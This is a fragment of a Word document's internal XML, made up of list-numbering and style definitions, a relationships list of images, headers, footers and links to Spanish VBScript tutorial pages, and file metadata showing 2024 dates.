      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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F6619E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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6E69B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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526D54">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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085EF6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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8648BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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B00B0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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3AC0C21"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DFE47C8"/>
    <w:lvl w:ilvl="0" w:tplc="4C4C643C">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A5D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84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854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EFC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F2C8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C29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DE4E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92B2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4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="8"/>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D2"/>
    <w:rsid w:val="00050E73"/>
    <w:rsid w:val="0011696B"/>
    <w:rsid w:val="003165B4"/>
    <w:rsid w:val="00635466"/>
    <w:rsid w:val="006C0511"/>
    <w:rsid w:val="00822E99"/>
    <w:rsid w:val="00873CAB"/>
    <w:rsid w:val="00E62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4E76"/>
  <w15:docId w15:val="{D9B11428-9F95-4E19-B8F8-33AAF4E7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1" w:line="249" w:lineRule="auto"/>
      <w:ind w:left="10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3" w:space="0" w:color="000000"/>
        <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
      <w:spacing w:after="22" w:line="250" w:lineRule="auto"/>
      <w:ind w:left="158" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="177"/>
      <w:ind w:left="10" w:right="70"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pBdr>
        <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        <w:right w:val="single" w:sz="2" w:space="0" w:color="808080"/>
      </w:pBdr>
      <w:spacing w:after="308"/>
      <w:ind w:left="32" w:hanging="10"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:bdr w:val="single" w:sz="2" w:space="0"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bdr w:val="single" w:sz="2" w:space="0" w:color="80808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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>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ub.telepolis.com/vbsatope/codigos/msgbox.htm" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpg"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><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19.jpg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpg"/><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cswinter.wordpress.com/"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hyperlink" Target="http://club.telepolis.com/vbsatope/codigos/msgbox.htm" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://club.telepolis.com/vbsatope/codigos/if.htm" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://club.telepolis.com/vbsatope/codigos/msgbox.htm" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://club.telepolis.com/vbsatope/objetos/carpetas.htm" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpg"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scswinter.110mb.com/" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scswinter.110mb.com/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xm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club.telepolis.com/vbsatope/codigos/msgbox.htm" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scswinter.110mb.com/" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scswinter.110mb.com/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scswinter.wordpress.com/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.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club.telepolis.com/vbsatope/codigos/msgbox.htm" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://club.telepolis.com/vbsatope/codigos/if.htm" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scswinter.110mb.com/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://club.telepolis.com/vbsatope/objetos/carpetas.htm" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpg"/><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15.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.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club.telepolis.com/vbsatope/codigos/i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5550-5819-491E-BB93-554AA06D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371</Words>
  <Characters>178817</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dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Enmanuel</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-12T18:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-12T20:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>